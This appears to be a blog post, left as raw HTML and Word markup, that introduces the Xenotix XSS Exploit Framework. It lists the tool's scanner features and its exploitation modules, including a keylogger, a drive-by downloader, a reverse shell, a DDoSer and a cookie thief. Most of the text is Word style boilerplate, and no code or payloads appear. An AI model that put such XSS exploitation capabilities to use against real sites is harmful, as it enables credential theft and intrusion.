&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;What is Xenotix XSS Exploit Framework?&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi48.tinypic.com/fc5o9y.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://oi48.tinypic.com/fc5o9y.jpg" height="242" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Xenotix
XSS Exploit Framework &lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;is
a penetration testing tool to detect and exploit XSS vulnerabilities in Web
Applications.This tool can inject codes into a webpage which are vulnerable to
XSS.It is basically a payload list based XSS Scanner and XSS Exploitation kit.
It provides a penetration tester the ability to test all the XSS payloads
available in the payload list against a web application to test for XSS
vulnerabilities. The tool supports both manual mode and automated time sharing
based test modes. The exploitation framework in the tool includes a XSS
encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader,
a XSS Reverse Shell and a XSS DDoSer. These exploitation tools will help the
penetration tester to create proof of concept attacks on vulnerable web
applications during the creation of a penetration test report.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;

&lt;/span&gt;&lt;/div&gt;
&lt;h4 class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Features of Xenotix XSS Exploit
Framework&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Xenotix
XSS Exploit Framework is divided into two module&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;h4&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;
&lt;/span&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;1.Scanner Module&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"&gt;
&lt;span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;Built in XSS
Payloads&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"&gt;
&lt;span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;HTML5
compactable Payload list&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"&gt;
&lt;span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;XSS Auto mode
Scanner&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"&gt;
&lt;span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;XSS
Multi-Parameter Scanner&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpLast" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"&gt;
&lt;span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;XSS Fuzzer&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="margin-left: .25in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h4&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2.
Exploitation Framework&lt;/span&gt;&lt;/b&gt;

&lt;/h4&gt;
&lt;div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"&gt;
&lt;span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;XSS Keylogger&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"&gt;
&lt;span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;XSS
Executable Drive-by downloader&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"&gt;
&lt;span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;XSS Payload
Encoder&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"&gt;
&lt;span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;XSS Reverse
Shell&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"&gt;
&lt;span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;XSS DDoSer&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"&gt;
&lt;span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;XSS Cookie
Thief&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpLast"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h4 class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;1. Scanner Module&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:RelyOnVML/&gt;
  &lt;o:AllowPNG/&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:TrackMoves/&gt;
  &lt;w:TrackFormatting/&gt;
  &lt;w:PunctuationKerning/&gt;
  &lt;w:ValidateAgainstSchemas/&gt;
  &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;
  &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;
  &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;
  &lt;w:DoNotPromoteQF/&gt;
  &lt;w:LidThemeOther&gt;EN-US&lt;/w:LidThemeOther&gt;
  &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;
  &lt;w:LidThemeComplexScript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
   &lt;w:DontGrowAutofit/&gt;
   &lt;w:SplitPgBreakAndParaMark/&gt;
   &lt;w:DontVertAlignCellWithSp/&gt;
   &lt;w:DontBreakConstrainedForcedTables/&gt;
   &lt;w:DontVertAlignInTxbx/&gt;
   &lt;w:Word11KerningPairs/&gt;
   &lt;w:CachedColBalance/&gt;
  &lt;/w:Compatibility&gt;
  &lt;m:mathPr&gt;
   &lt;m:mathFont m:val="Cambria Math"/&gt;
   &lt;m:brkBin m:val="before"/&gt;
   &lt;m:brkBinSub m:val="--"/&gt;
   &lt;m:smallFrac m:val="off"/&gt;
   &lt;m:dispDef/&gt;
   &lt;m:lMargin m:val="0"/&gt;
   &lt;m:rMargin m:val="0"/&gt;
   &lt;m:defJc m:val="centerGroup"/&gt;
   &lt;m:wrapIndent m:val="1440"/&gt;
   &lt;m:intLim m:val="subSup"/&gt;
   &lt;m:naryLim m:val="undOvr"/&gt;
  &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
  LatentStyleCount="267"&gt;
  &lt;w:LsdException Locked="false" Priority="0" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Normal"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/&gt;
  &lt;w:LsdException Locked="false" Priority="10" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/&gt;
  &lt;w:LsdException Locked="false" Priority="11" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/&gt;
  &lt;w:LsdException Locked="false" Priority="22" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Strong"/&gt;
  &lt;w:LsdException Locked="false" Priority="20" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="59" SemiHidden="false"
   UnhideWhenUsed="false" Name="Table Grid"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/&gt;
  &lt;w:LsdException Locked="false" Priority="34" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/&gt;
  &lt;w:LsdException Locked="false" Priority="29" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="30" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/&gt;
